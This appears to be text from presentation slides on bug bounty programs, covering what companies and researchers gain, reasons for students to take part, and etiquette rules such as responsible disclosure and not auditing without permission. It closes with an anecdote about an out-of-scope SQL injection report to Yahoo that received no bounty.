• Offer HOF (or) Swag (or) Reward (or) Duplicate • Get the all vulnerabilities and Fix asap ! • Make products and applications secure Researcher : • Find the vulnerabilities in target • Get mostly duplicates :P • Other wise Hof, Swag (or) Reward ! • Share in Social Network
Chances of finding bugs to put on your resume • Possibility of getting a job in the industry • Opportunity to make money while attending college • Working with researchers/hackers from all over the world
you don't want to be an underdog. • Do not use any automated scanners/ It's lame (It's ok if you use your own tools. Don't tell me you're the Author of Acunetix scanner =]], pretty lame). • Do not make any information public until the issue has been resolved. • Do not report of missed protection mechanism / inconsistent with best practices (e.g. no CSRF token, framing/clickjacking protection) without demonstration of real security impact for user or system.
• Don’t ask for money or “swag” if it’s not mentioned in the rules. • Don’t compare two programs. Two programs = different budgets. • Don’t audit without permission. Legal issues • Respect the program’s decisions. • Respect other researchers. • Quality vs Quantity. Reputation in the industry.
Meanwhile Sql Injection in http://br.educacao.yahoo.net (out of scope), Yahoo decided this report is not eligible for a bounty. It's OK, It's Yahoo's logic.